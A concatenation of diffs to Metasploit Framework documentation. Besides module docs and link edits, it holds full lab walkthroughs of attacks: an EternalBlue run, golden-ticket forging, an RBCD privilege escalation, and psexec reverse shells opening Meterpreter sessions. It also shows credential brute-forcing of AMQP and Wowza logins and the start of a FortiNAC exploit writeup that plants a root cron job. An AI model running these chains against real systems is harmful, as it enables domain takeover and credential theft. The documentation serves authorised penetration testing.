+For exploit modules, the payload is encoded encoded using Base64 and specified in a top level `payload_encoded` key, implemented [here](https://github.com/rapid7/metasploit-framework/blob/668735e4185968405c0073465f9aafbf62930538/lib/msf/core/modules/external/templates/remote_exploit.erb#L36-L39).
+Below is an example of the ([now deleted](https://github.com/rapid7/metasploit-framework/pull/15217)) [ms17_010_eternalblue_win8.py](https://github.com/rapid7/metasploit-framework/blob/6dd298ebb76a1617e24da5e4c73e43a46b226a23/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py) module running:
+
+```
+$ cat options.json
+{
+    "jsonrpc": "2.0",
+    "id": "1337",
+    "method": "run",
+    "params": {
+        "VERBOSE": true,
+        "RHOST": "192.168.144.131",
+        "RPORT": "445",
+        "GroomAllocations": 13,
+        "ProcessName": "spoolsv.exe",
+        "SMBUser": "test",
+        "SMBPass": "123456",
+        "payload_encoded": "/EiD5PDozAAA...etc...==="
+    }
+}
+
+$ cat options.json | PYTHONPATH=./lib/msf/core/modules/external/python:$PYTHONPATH python3 modules/exploits/windows/smb/ms17_010_eternalblue_win8.py
+{"jsonrpc": "2.0", "method": "message", "params": {"level": "info", "message": "shellcode size: 1221"}}
+{"jsonrpc": "2.0", "method": "message", "params": {"level": "info", "message": "numGroomConn: 13"}}
+{"jsonrpc": "2.0", "method": "message", "params": {"level": "info", "message": "Target OS: Windows 10 Pro 10240"}}
+{"jsonrpc": "2.0", "method": "message", "params": {"level": "info", "message": "got good NT Trans response"}}
+{"jsonrpc": "2.0", "method": "message", "params": {"level": "info", "message": "got good NT Trans response"}}
+{"jsonrpc": "2.0", "method": "message", "params": {"level": "info", "message": "SMB1 session setup allocate nonpaged pool success"}}
+{"jsonrpc": "2.0", "method": "message", "params": {"level": "info", "message": "SMB1 session setup allocate nonpaged pool success"}}
+```
+
+To add breakpoints to your Python code, add the below code snippet. Note that the interactive breakpoints will only work when
+running the external modules as standalone Python scripts, and won't work when running from msfconsole:
+
+```python
+import pdb; pdb.pry
+```
+
 ## Coding with Style

 All the Python code in Metasploit aims to be [PEP 8](https://www.python.org/dev/peps/pep-0008/) compliant. The biggest differences coming from Metasploit's Ruby style:
@@ -202,4 +295,4 @@ The external modules communicate with framework via JSON-RPC. If your Python mod

 [Metasploit Python library](https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/modules/external/python/)

-[ERB Templates](https://github.com/rapid7/metasploit-framework/tree/master/lib/msf/core/modules/external/templates)
+[ERB Templates](https://github.com/rapid7/metasploit-framework/tree/master/lib/msf/core/modules/external/templates)
@@ -2,7 +2,7 @@

 This is a guide for setting up a developer environment to contribute modules, documentation, and fixes to the Metasploit Framework. If you just want to use Metasploit for legal, authorized hacking, we recommend instead you:

- - Install the [open-source Omnibus installer][open-source-installer], or
+ - Install the [[open-source Omnibus installer|./nightly-installers.md]], or
 - Use the pre-installed Metasploit on [Kali Linux][kali-user-instructions] or [Parrot Linux][parrot-user-instructions].

 If you want to contribute to Metasploit, start by reading our [CONTRIBUTING.md], then follow the rest of this guide.
@@ -155,7 +155,7 @@ cd ~/git/metasploit-framework
 $ ./msfconsole -qx "db_status; exit"
 ```

-Congratulations! You have now set up the [Metasploit Web Service (REST API)][msf-web-service] and the backend database.
+Congratulations! You have now set up the [[Metasploit Web Service (REST API)|./metasploit-web-service.md]] and the backend database.

 ## Optional: Tips to speed up common workflows

@@ -167,7 +167,7 @@ Making sure you're in the right directory to run `msfconsole` can become tedious
 echo 'alias msfconsole="pushd $HOME/git/metasploit-framework && ./msfconsole && popd"' >> ~/.bash_aliases
 ```

-Consider generating a GPG key to sign your commits.  Read about [why][git-horror] and [how][signing-howto]. Once you have done this, consider enabling automatic signing of all your commits with the following command:
+Consider generating a GPG key to sign your commits.  Read about [why][git-horror] and [[how|./committer-keys.md#signing-your-commits-and-merges]. Once you have done this, consider enabling automatic signing of all your commits with the following command:

 ```
 cd *path to your cloned MSF repository on disk*
@@ -212,12 +212,11 @@ You should see over 9000 tests run, mostly resulting in green dots, a few in yel

 # Great!  Now what?

-We're excited to see your upcoming contributions of new modules, documentation, and fixes!  Check out our [wiki documentation][wiki-documentation] and, if you're looking for inspiration, keep an eye out for [newbie-friendly pull requests and issues][newbie-friendly-prs-issues].   Please [submit your new pull requests][howto-PR] and reach out to us on [Slack] for community help.
+We're excited to see your upcoming contributions of new modules, documentation, and fixes! If you're looking for inspiration, keep an eye out for [newbie-friendly pull requests and issues][newbie-friendly-prs-issues].   Please [submit your new pull requests][howto-PR] and reach out to us on [Slack] for community help.

 Finally, we welcome your feedback on this guide, so feel free to reach out to us on [Slack] or open a [new issue].  For their significant contributions to this guide, we would like to thank [@kernelsmith], [@corelanc0d3r], and [@ffmike].

 [commercial-installer]:http://metasploit.com/download
-[open-source-installer]:https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html
 [kali-user-instructions]:https://docs.kali.org/general-use/starting-metasploit-framework-in-kali
 [parrot-user-instructions]:https://parrotsec.org/docs/installation.html
 [CONTRIBUTING.md]:https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md
@@ -240,14 +239,10 @@ Finally, we welcome your feedback on this guide, so feel free to reach out to us
 [find]:https://linux.die.net/man/1/find
 [$PATH]:https://askubuntu.com/questions/109381/how-to-add-path-of-a-program-to-path-environment-variable

-[msf-web-service]:https://docs.metasploit.com/docs/using-metasploit/advanced/metasploit-web-service.html
-
 [git-horror]:https://mikegerwitz.com/papers/git-horror-story#trust-ensure
-[signing-howto]:https://docs.metasploit.com/docs/development/maintainers/committer-keys.html#signing-howto

 [git aliases]:https://git-scm.com/book/en/v2/Git-Basics-Git-Aliases
 [rspec]:https://www.rubyguides.com/2018/07/rspec-tutorial/
-[wiki-documentation]:https://docs.metasploit.com/#metasploit-development
 [newbie-friendly-prs-issues]:https://github.com/rapid7/metasploit-framework/issues?q=is%3Aopen+label%3Anewbie-friendly
 [howto-PR]:https://help.github.com/articles/about-pull-requests/
 [new issue]:https://github.com/rapid7/metasploit-framework/issues/new/choose
@@ -183,6 +183,10 @@ NAVIGATION_CONFIG = [
              {
                path: '../../documentation/modules/auxiliary/admin/kerberos/ticket_converter.md',
                title: 'Converting kirbi and ccache files'
+              },
+              {
+                path: '../../documentation/modules/auxiliary/admin/ldap/rbcd.md',
+                title: 'RBCD - Resource-based constrained delegation'
              }
            ]
          },
@@ -820,6 +824,9 @@ NAVIGATION_CONFIG = [
          },
          {
            path: 'Loading-Test-Modules.md'
+          },
+          {
+            path: 'Measuring-Metasploit-Performance.md'
          }
        ]
      },
@@ -56,19 +56,30 @@ The user's AES key to use for Kerberos authentication in hex string. Supported
 keys: 128 or 256 bits.

 ### SPN
-The Service Principal Name, the format is `service_name/FQDN` . Ex:
-cifs/dc01.mydomain.local. This option is only used when requesting a TGS.
+
+This option is only used when requesting a TGS.
+
+The Service Principal Name, the format is `service_name/FQDN`.
+Ex: cifs/dc01.mydomain.local.

 ### IMPERSONATE
 The user on whose behalf a TGS is requested (it will use S4U2Self/S4U2Proxy to
 request the ticket).

 ### KrbUseCachedCredentials
+
+This option is only used when requesting a TGS.
+
 If set to `true`, it looks for a matching TGT in the database and, if found,
-use it for Kerberos authentication when requesting a TGS. Note that this option
-only applies to `GET_TGS` action and has no effect on the `GET_TGT` action.
+use it for Kerberos authentication when requesting a TGS.
 Default is `true`.

+### Krb5Ccname
+
+This option is only used when requesting a TGS.
+
+The Kerberos TGT to use when requesting the sevice ticket. If unset, the database will be checked'
+
 ## Scenarios

 ### Requesting a TGT
@@ -283,3 +294,42 @@ host             service  type                 name  content                   i
 10.0.0.24                 mit.kerberos.ccache        application/octet-stream  realm: MYLAB.LOCAL, serviceName: krbtgt/mylab.local, username: servicea          /home/msfuser/.msf4/loot/20221201210211_default_10.0.0.24_mit.kerberos.cca_667626.bin
 10.0.0.24                 mit.kerberos.ccache        application/octet-stream  realm: MYLAB.LOCAL, serviceName: cifs/dc02.mylab.local, username: administrator  /home/msfuser/.msf4/loot/20221201210211_default_10.0.0.24_mit.kerberos.cca_757041.bin
 ```
+
+TGS using a previously forged golden ticket:
+
+```
+# Forge a golden ticket
+msf6 auxiliary(admin/kerberos/forge_ticket) > run action=FORGE_GOLDEN aes_key=dac659cec15c80bb2bc8b26cdd3f29076cff84da7ab7ec6cf9dfc2cafa33e087 domain_sid=S-1-5-21-2771926996-166873999-4256077803 domain=dev.demo.local spn=krbtgt/DEV.DEMO.LOCAL user=Administrator
+
+[*] TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230309120450_default_unknown_mit.kerberos.cca_940462.bin
+[*] Auxiliary module execution completed
+
+
+# Request a silver ticket:
+
+msf6 auxiliary(admin/kerberos/get_ticket) > run action=GET_TGS rhosts=10.10.11.5 Krb5Ccname=/Users/user/.msf4/loot/20230309120450_default_unknown_mit.kerberos.cca_940462.bin username=Administrator domain=dev.demo.local spn=cifs/dc02.dev.demo.local
+[*] Running module against 10.10.11.5
+
+[*] 10.10.11.5:88 - Using cached credential for krbtgt/DEV.DEMO.LOCAL@DEV.DEMO.LOCAL Administrator@DEV.DEMO.LOCAL
+[*] 10.10.11.5:88 - Getting TGS for Administrator@dev.demo.local (SPN: cifs/dc02.dev.demo.local)
+[+] 10.10.11.5:88 - Received a valid TGS-Response
+[*] 10.10.11.5:88 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230309120802_default_10.10.11.5_mit.kerberos.cca_352530.bin
+[+] 10.10.11.5:88 - Received a valid delegation TGS-Response
+[*] Auxiliary module execution completed
+
+# Use psexec:
+
+msf6 exploit(windows/smb/psexec) > run rhost=10.10.11.5 smbdomain=dev.demo.local username=Administrator smb::auth=kerberos smb::krb5ccname=/Users/user/.msf4/loot/20230309120802_default_10.10.11.5_mit.kerberos.cca_352530.bin smb::rhostname=dc02.dev.demo.local domaincontrollerrhost=10.10.11.5 lhost=192.168.123.1
+
+[*] Started reverse TCP handler on 192.168.123.1:4444
+[*] 10.10.11.5:445 - Connecting to the server...
+[*] 10.10.11.5:445 - Authenticating to 10.10.11.5:445|dev.demo.local as user 'Administrator'...
+[*] 10.10.11.5:445 - Loaded a credential from ticket file: /Users/user/.msf4/loot/20230309120802_default_10.10.11.5_mit.kerberos.cca_352530.bin
+[*] 10.10.11.5:445 - Selecting PowerShell target
+[*] 10.10.11.5:445 - Executing the payload...
+[+] 10.10.11.5:445 - Service start timed out, OK if running a command or non-service executable...
+[*] Sending stage (175686 bytes) to 10.10.11.5
+
+[*] Meterpreter session 1 opened (192.168.123.1:4444 -> 10.10.11.5:60625) at 2023-03-09 12:08:49 +0000
+meterpreter >
+```
@@ -1,17 +1,86 @@
-## Vulnerable Application
+## RBCD Exploitation

-This module can read and write the necessary LDAP attributes to configure a particular object for Role Based Constrained
-Delegation (RBCD). When writing, the module will add an access control entry to allow the account specified in
-DELEGATE_FROM to the object specified in DELEGATE_TO. In order for this to succeed, the authenticated user must have
-write access to the target object (the object specified in DELEGATE_TO).
+If an account has the ability to write to the `msDS-AllowedToActOnBehalfOfOtherIdentity` attribute against a target, i.e. having
+`GenericWrite` privileges, this can be abused for privilege escalation.

-## Verification Steps
+The `auxiliary/admin/ldap/rbcd` module can be used to read and write the `msDS-AllowedToActOnBehalfOfOtherIdentity` LDAP attribute against a target
+for Role Based Constrained Delegation (RBCD). When writing, the module will add an access control entry (ACE) to allow the account specified in
+`DELEGATE_FROM` to the object specified in `DELEGATE_TO`. For privilege escalation - the `auxiliary/admin/kerberos/get_ticket` module can then
+be used to request a new Kerberos S4U impersonation ticket for the Administrator account.
+
+In order for the `auxiliary/admin/ldap/rbcd` module to succeed, the authenticated user must have write access to the target object (the object specified in `DELEGATE_TO`).
+
+## Lab setup
+
+For the RBCD attack to work an Active Directory account (i.e. `sandy`) is required with write privileges to the target computer (i.e. `WS01`).
+
+From an admin powershell prompt, first create a new Active Directory account, `sandy`, in your Active Directory environment:
+
+```powershell
+# Create a basic user account
+net user /add sandy Password1!
+
+# Mark the sandy and password as never expiring, to ensure the lab setup still works in the future
+net user sandy /expires:never
+Set-AdUser -Identity sandy -PasswordNeverExpires:$true
+```
+
+Grant Write privileges for sandy to the target machine, i.e. `WS01`:
+
+```powershell
+# Remember to change WS01 to the name of your target Computer (i.e. the output of the hostname command)
+$TargetComputer = Get-ADComputer 'WS01'
+$User = Get-ADUser 'sandy'
+
+# Add GenericWrite access to the user against the target coputer
+$Rights = [System.DirectoryServices.ActiveDirectoryRights] "GenericWrite"
+$ControlType = [System.Security.AccessControl.AccessControlType] "Allow"
+$InheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance] "All"
+$GenericWriteAce = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $User.Sid,$Rights,$ControlType,$InheritanceType
+$TargetComputerAcl = Get-Acl "AD:$($TargetComputer.DistinguishedName)"
+$TargetComputerAcl.AddAccessRule($GenericWriteAce)
+Set-Acl -AclObject $TargetComputerAcl -Path "AD:$($TargetComputer.DistinguishedName)"
+```
+
+Finally Verify the Write privileges for the sandy account:
+
+```powershell
+PS C:\Users\administrator> $TargetComputer = Get-ADComputer 'WS01'
+PS C:\Users\administrator> (Get-ACL "AD:$($TargetComputer.DistinguishedName)").Access| Where-Object { $_.IdentityReference -Match 'sandy' }
+
+ActiveDirectoryRights : GenericWrite
+InheritanceType       : All
+ObjectType            : 00000000-0000-0000-0000-000000000000
+InheritedObjectType   : 00000000-0000-0000-0000-000000000000
+ObjectFlags           : None
+AccessControlType     : Allow
+IdentityReference     : MSFLAB\sandy
+IsInherited           : False
+InheritanceFlags      : ContainerInherit
+PropagationFlags      : None
+```
+
+## Module usage
+
+The `admin/dcerpc/samr_computer` module is generally used to first create a computer account, which requires no permissions:
+
+1. From msfconsole
+2. Do: `use auxiliary/admin/dcerpc/samr_computer`
+3. Set the `RHOSTS`, `SMBUser` and `SMBPass` options
+   a. For the `ADD_COMPUTER` action, if you don't specify `COMPUTER_NAME` or `COMPUTER_PASSWORD` - one will be generated automatically
+   b. For the `DELETE_COMPUTER` action, set the `COMPUTER_NAME` option
+   c. For the `LOOKUP_COMPUTER` action, set the `COMPUTER_NAME` option
+4. Run the module and see that a new machine account was added
+
+Then the `auxiliary/admin/ldap/rbcd` can be used:

 1. Set the `RHOST` value to a target domain controller
-2. Set the `BIND_DN` and `BIND_PW` information to an account with the necessary privileges
+2. Set the `USERNAME` and `PASSWORD` information to an account with the necessary privileges
 3. Set the `DELEGATE_TO` and `DELEGATE_FROM` data store options
 4. Use the `WRITE` action to configure the target for RBCD

+See the Scenarios for a more detailed walk through
+
 ## Actions

 ### FLUSH
@@ -42,13 +111,16 @@ the delegation target.
 ## Scenarios

 ### Window Server 2019 Domain Controller
+
 In the following example the user `MSFLAB\sandy` has write access to the computer account `WS01$`. The sandy account is
-used to add a new computer account to the domain, then configures WS01$ for delegation from the new computer account.
+used to add a new computer account to the domain, then configures `WS01$` for delegation from the new computer account.

 The new computer account can then impersonate any user, including domain administrators, on `WS01$` by authenticating
 with the Service for User (S4U) Kerberos extension.

-```
+First create the computer account:
+
+```msf
 msf6 auxiliary(admin/dcerpc/samr_computer) > show options

 Module options (auxiliary/admin/dcerpc/samr_computer):
@@ -86,9 +158,14 @@ msf6 auxiliary(admin/dcerpc/samr_computer) > run
 [+] 192.168.159.10:445 -   SID:      S-1-5-21-3402587289-1488798532-3618296993-1655
 [*] Auxiliary module execution completed
 msf6 auxiliary(admin/dcerpc/samr_computer) > use auxiliary/admin/ldap/rbcd
-msf6 auxiliary(admin/ldap/rbcd) > set BIND_DN sandy@msflab.local
+```
+
+Now use the RBCD module to read the the current value of `msDS-AllowedToActOnBehalfOfOtherIdentity`:
+
+```msf
+msf6 auxiliary(admin/ldap/rbcd) > set USERNAME sandy@msflab.local
 BIND_DN => sandy@msflab.local
-msf6 auxiliary(admin/ldap/rbcd) > set BIND_PW Password1!
+msf6 auxiliary(admin/ldap/rbcd) > set PASSWORD Password1!
 BIND_PW => Password1!
 msf6 auxiliary(admin/ldap/rbcd) > set RHOSTS 192.168.159.10
 RHOSTS => 192.168.159.10
@@ -102,6 +179,11 @@ msf6 auxiliary(admin/ldap/rbcd) > read
 [+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local
 [*] The msDS-AllowedToActOnBehalfOfOtherIdentity field is empty.
 [*] Auxiliary module execution completed
+```
+
+Writing a new `msDS-AllowedToActOnBehalfOfOtherIdentity` value using the computer account created by `admin/dcerpc/samr_computer`:
+
+```msf
 msf6 auxiliary(admin/ldap/rbcd) > set DELEGATE_FROM DESKTOP-QLSTR9NW$
 DELEGATE_FROM => DESKTOP-QLSTR9NW$
 msf6 auxiliary(admin/ldap/rbcd) > write
@@ -112,6 +194,11 @@ msf6 auxiliary(admin/ldap/rbcd) > write
 [+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local
 [+] Successfully created the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.
 [*] Auxiliary module execution completed
+```
+
+Reading the value of `msDS-AllowedToActOnBehalfOfOtherIdentity` to verify the value is updated:
+
+```msf
 msf6 auxiliary(admin/ldap/rbcd) > read
 [*] Running module against 192.168.159.10

@@ -123,3 +210,38 @@ msf6 auxiliary(admin/ldap/rbcd) > read
 [*] Auxiliary module execution completed
 msf6 auxiliary(admin/ldap/rbcd) >
 ```
+
+Next we can use the `auxiliary/admin/kerberos/get_ticket` module to request a new S4U impersonation ticket for the Administrator
+account using the previously created machine account. For instance requesting a service ticket for SMB access:
+
+```msf
+msf6 auxiliary(admin/kerberos/get_ticket) > run action=GET_TGS rhost=192.168.159.10 username=DESKTOP-QLSTR9NW password=A2HPEkkQzdxQirylqIj7BxqwB7kuUMrT domain=msflab.local spn=cifs/ws01.msflab.local impersonate=Administrator
+[*] Running module against 192.168.159.10
+
+[+] 192.168.159.10:88 - Received a valid TGT-Response
+[*] 192.168.159.10:88 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230222095449_default_192.168.159.10_mit.kerberos.cca_533930.bin
+[*] 192.168.159.10:88 - Getting TGS impersonating Administrator@msflab.local (SPN: cifs/ws01.msflab.local)
+[+] 192.168.159.10:88 - Received a valid TGS-Response
+[*] 192.168.159.10:88 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230222095449_default_192.168.159.10_mit.kerberos.cca_962080.bin
+[+] 192.168.159.10:88 - Received a valid TGS-Response
+[*] 192.168.159.10:88 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230222095449_default_192.168.159.10_mit.kerberos.cca_614556.bin
+[*] Auxiliary module execution completed
+```
+
+The saved TGS can be used in a pass-the-ticket style attack. For instance using the `exploit/windows/smb/psexec` module for a reverse shell:
+
+```msf
+msf6 exploit(windows/smb/psexec) > run lhost=192.168.123.1 rhost=192.168.159.10 username=Administrator smb::auth=kerberos smb::rhostname=ws01.msflab.local domaincontrollerrhost=192.168.159.10 smbdomain=msflab.local smb::krb5ccname=/Users/user/.msf4/loot/20230222095449_default_192.168.159.10_mit.kerberos.cca_614556.bin
+
+[*] Started reverse TCP handler on 192.168.123.1:4444
+[*] 192.168.159.10:445 - Connecting to the server...
+[*] 192.168.159.10:445 - Authenticating to 192.168.159.10:445|msflab.local as user 'Administrator'...
+[*] 192.168.159.10:445 - Loaded a credential from ticket file: /Users/user/.msf4/loot/20230222095449_default_192.168.159.10_mit.kerberos.cca_614556.bin
+[*] 192.168.159.10:445 - Selecting PowerShell target
+[*] 192.168.159.10:445 - Executing the payload...
+[+] 192.168.159.10:445 - Service start timed out, OK if running a command or non-service executable...
+[*] Sending stage (175686 bytes) to 192.168.159.10
+[*] Meterpreter session 3 opened (192.168.123.1:4444 -> 192.168.159.10:60755) at 2023-02-22 10:00:01 +0000
+
+meterpreter >
+```
@@ -0,0 +1,98 @@
+## Vulnerable Application
+
+This module will test AMQP logins on a range of machines and report successful logins.  If you have loaded a database
+plugin and connected to a database this module will record successful logins and hosts so you can track your access.
+
+## Verification Steps
+
+1. Install RabbitMQ and start it
+   1. To use Docker, run: `docker run --rm -it --hostname "$(hostname)" -p 15672:15672 -p 5672:5672 rabbitmq:3-management`
+2. Start msfconsole
+3. Do: `use auxiliary/scanner/amqp/amqp_login`
+4. Do: `set rhosts`
+5. Do: set usernames and passwords via any of the available options
+6. Do: `run`
+
+## Options
+
+### BLANK_PASSWORD
+
+Boolean value on if an additional login attempt should be attempted with an empty password for every user.
+
+### PASSWORD
+
+Password to try for each user.
+
+### PASS_FILE
+
+A file containing a password on every line. Kali linux example: `/usr/share/wordlists/metasploit/password.lst`
+
+### STOP_ON_SUCCESS
+
+If a valid login is found on a host, immediately stop attempting additional logins on that host.
+
+### USERNAME
+
+Username to try for each password.
+
+### USERPASS_FILE
+
+A file containing a username and password, separated by a space, on every line. An example line would be `username
+password`.
+
+### USER_AS_PASS
+
+Boolean value on if an additional login attempt should be attempted with the password as the username.
+
+### USER_FILE
+
+A file containing a username on every line.
+
+### VERBOSE
+
+Show a failed login attempt. This can get rather verbose when large `USER_FILE`s or `PASS_FILE`s are used. A failed
+attempt will look similar to the following:
+
+```
+[-] 192.168.159.128:5672 - LOGIN FAILED: admin:Password1! (Incorrect: ACCESS_REFUSED - Login was refused using authentication mechanism PLAIN. For details see the broker logfile.)
+```
+
+## Option Combinations
+
+It is important to note that usernames and passwords can be entered in multiple combinations. For instance, a password
+could be set in `PASSWORD`, be part of either `PASS_FILE` or `USERPASS_FILE`, be guessed via `USER_AS_PASS` or
+`BLANK_PASSWORDS`. This module makes a combination of all of the above when attempting logins. So if a password is set
+in `PASSWORD`, and a `PASS_FILE` is listed, passwords will be generated from BOTH of these.
+
+## Scenarios
+### RabbitMQ 3.11.10 on Docker
+
+The Docker container listens on 5672/tcp without SSL. There's also an administrative site running on 15672/tcp where
+users can be added. The default credentials to login are `guest` / `guest`. A new `admin` account was added for this
+example.
+
+```
+msf6 > use auxiliary/scanner/amqp/amqp_login 
+msf6 auxiliary(scanner/amqp/amqp_login) > set RHOSTS 192.168.159.128
+RHOSTS => 192.168.159.128
+msf6 auxiliary(scanner/amqp/amqp_login) > set USERNAME admin
+USERNAME => admin
+msf6 auxiliary(scanner/amqp/amqp_login) > set PASS_FILE data/wordlists/unix_passwords.txt
+PASS_FILE => data/wordlists/unix_passwords.txt
+msf6 auxiliary(scanner/amqp/amqp_login) > set RPORT 5672
+RPORT => 5672
+msf6 auxiliary(scanner/amqp/amqp_login) > set SSL false
+[!] Changing the SSL option's value may require changing RPORT!
+SSL => false
+msf6 auxiliary(scanner/amqp/amqp_login) > run
+
+[-] 192.168.159.128:5672 - LOGIN FAILED: admin:Password1! (Incorrect: ACCESS_REFUSED - Login was refused using authentication mechanism PLAIN. For details see the broker logfile.)
+[-] 192.168.159.128:5672 - LOGIN FAILED: admin:admin (Incorrect: ACCESS_REFUSED - Login was refused using authentication mechanism PLAIN. For details see the broker logfile.)
+[-] 192.168.159.128:5672 - LOGIN FAILED: admin:123456 (Incorrect: ACCESS_REFUSED - Login was refused using authentication mechanism PLAIN. For details see the broker logfile.)
+[-] 192.168.159.128:5672 - LOGIN FAILED: admin:12345 (Incorrect: ACCESS_REFUSED - Login was refused using authentication mechanism PLAIN. For details see the broker logfile.)
+[-] 192.168.159.128:5672 - LOGIN FAILED: admin:123456789 (Incorrect: ACCESS_REFUSED - Login was refused using authentication mechanism PLAIN. For details see the broker logfile.)
+[+] 192.168.159.128:5672 - Login Successful: admin:password
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/amqp/amqp_login) > 
+```
@@ -0,0 +1,55 @@
+## Description
+
+This module displays the version information about Advanced Message Queuing Protocol (AMQP) 0-9-1 servers. Per the
+specification, the "server-properties":
+
+> ... SHOULD contain at least these fields: "host", specifying the server host name or address, "product", giving the
+> name of the server product, "version", giving the name of the server version, "platform", giving the name of the
+> operating system, "copyright", if appropriate, and "information", giving other general information.
+
+*See: https://www.rabbitmq.com/amqp-0-9-1-reference.html#connection.start.server-properties*
+
+## Verification Steps
+
+1. Do: `use auxiliary/scanner/amqp/amqp_version`
+2. Do: `set RHOSTS [IP]`
+3. Do: `set RPORT [PORT]`
+4. Do: `run`
+
+## Scenarios
+
+**Running the scanner**
+
+```
+msf6 > use auxiliary/scanner/amqp/amqp_version
+msf6 auxiliary(scanner/amqp/amqp_version) > set RHOSTS 192.168.159.0/24
+RHOSTS => 192.168.159.0/24
+msf6 auxiliary(scanner/amqp/amqp_version) > run
+
+[*] 192.168.159.17:5671 - AMQP Detected (version:RabbitMQ 3.8.16) (cluster:rabbit@WIN-KHPRSGSRF30) (platform:Erlang/OTP 23.3) (authentication:AMQPLAIN, PLAIN)
+[*] 192.168.159.0/24:5671 - Scanned  51 of 256 hosts (19% complete)
+[*] 192.168.159.0/24:5671 - Scanned  53 of 256 hosts (20% complete)
+[*] 192.168.159.0/24:5671 - Scanned  98 of 256 hosts (38% complete)
+[*] 192.168.159.128:5671 - AMQP Detected (version:RabbitMQ 3.11.10) (cluster:rabbit@my-rabbit) (platform:Erlang/OTP 25.3) (authentication:PLAIN, AMQPLAIN)
+[*] 192.168.159.0/24:5671 - Scanned 104 of 256 hosts (40% complete)
+[*] 192.168.159.0/24:5671 - Scanned 150 of 256 hosts (58% complete)
+[*] 192.168.159.0/24:5671 - Scanned 154 of 256 hosts (60% complete)
+[*] 192.168.159.0/24:5671 - Scanned 199 of 256 hosts (77% complete)
+[*] 192.168.159.0/24:5671 - Scanned 216 of 256 hosts (84% complete)
+[*] 192.168.159.0/24:5671 - Scanned 233 of 256 hosts (91% complete)
+[*] 192.168.159.0/24:5671 - Scanned 256 of 256 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/amqp/amqp_version) > services 
+Services
+========
+
+host             port  proto  name   state  info
+----             ----  -----  ----   -----  ----
+192.168.159.17   5671  tcp    amqps  open   AMQP Detected (version:RabbitMQ 3.8.16) (cluster:rabbit@WIN-KHPRSGSRF30) (platform:Erlang/OTP 23.3) (authentication:AMQPLAIN, PL
+                                            AIN)
+192.168.159.128  5671  tcp    amqps  open   AMQP Detected (version:RabbitMQ 3.11.10) (cluster:rabbit@my-rabbit) (platform:Erlang/OTP 25.3) (authentication:PLAIN, AMQPLAIN)
+
+msf6 auxiliary(scanner/amqp/amqp_version) 
+```
+
+[1]: https://www.rabbitmq.com/amqp-0-9-1-reference.html#connection.start.server-properties
@@ -0,0 +1,66 @@
+## Vulnerable Application
+
+This module will attempt to authenticate to Wowza Streaming Engine
+via Wowza Streaming Engine Manager web interface.
+
+
+## Installation Steps
+
+Download and install [Wowza Streaming Engine](https://portal.wowza.com/account/downloads).
+
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use modules/auxiliary/scanner/http/wowza_streaming_engine_manager_login`
+1. Do: `set rhosts <rhosts>`
+1. Do: `run`
+1. On success you should get valid credentials.
+
+## Options
+
+### USERNAME
+
+The username for Wowza Streaming Engine Manager.
+
+### PASSWORD
+
+The password for Wowza Streaming Engine Manager.
+
+### TARGETURI
+
+The path to Wowza Streaming Engine Manager.
+
+
+## Scenarios
+
+
+### Wowza Streaming Engine Manager Version 4.8.20+1 (build 20220919162035) on Ubuntu 22.04
+
+```
+msf6 > use auxiliary/scanner/http/wowza_streaming_engine_manager_login 
+msf6 auxiliary(scanner/http/wowza_streaming_engine_manager_login) > set rhosts 192.168.200.158
+rhosts => 192.168.200.158
+msf6 auxiliary(scanner/http/wowza_streaming_engine_manager_login) > set username user
+username => user
+msf6 auxiliary(scanner/http/wowza_streaming_engine_manager_login) > set pass_file data/wordlists/unix_passwords.txt
+pass_file => data/wordlists/unix_passwords.txt
+msf6 auxiliary(scanner/http/wowza_streaming_engine_manager_login) > run
+
+[+] 192.168.200.158:8088 - Found Wowza Streaming Engine Manager
+[-] 192.168.200.158:8088 - Failed: 'user:admin'
+[-] 192.168.200.158:8088 - Failed: 'user:123456'
+[-] 192.168.200.158:8088 - Failed: 'user:12345'
+[-] 192.168.200.158:8088 - Failed: 'user:123456789'
+[+] 192.168.200.158:8088 - Success: 'user:password'
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/http/wowza_streaming_engine_manager_login) > creds
+Credentials
+===========
+
+host             origin           service          public  private   realm  private_type  JtR Format
+----             ------           -------          ------  -------   -----  ------------  ----------
+192.168.200.158  192.168.200.158  8088/tcp (http)  user    password         Password      
+```
@@ -0,0 +1,192 @@
+## Vulnerable Application
+
+This module uploads a payload to the `/tmp` directory in addition to a cron job to `/etc/cron.d` which executes the payload
+in the context of the `root` user.
+
+The core vulnerability is an arbitrary file write issue in `/configWizard/keyUpload.jsp` which is accessible remotely and without
+authentication. When you send this endpoint a ZIP file, it will extract an an attacker controlled file to directory
+on the system of the attacker's choice.
+
+This issue is exploitable on the following versions of FortiNAC:
+
+- FortiNAC version 9.4 prior to 9.4.1
+- FortiNAC version 9.2 prior to 9.2.6
+- FortiNAC version 9.1 prior to 9.1.8
+- FortiNAC 8.8 all versions
+- FortiNAC 8.7 all versions
+- FortiNAC 8.6 all versions
+- FortiNAC 8.5 all versions
+- FortiNAC 8.3 all versions
+
+### Setup
+
+Navigate to https://www.fortinet.com/demo-center/nac-demo to obtain a FortiNAC free product demo. Fill out the
+necessary fields in order to download: first name, last name, job function, job level, company, email address, phone
+number, state, zip/postal code. You'll receive a confirmation email; click the link in the email in order to access the
+free product download.
+
+Import the OVA file into your virtualization software of choice. Personally, I had success using VMWare Fusion. Note
+that when using VMWare products, you will need to use a tool such as 7-Zip to unzip the `.ova` file, find the manifest
+file contained within, which will end with `.mf`, and then rezip the file again. This is due to a bug noted at
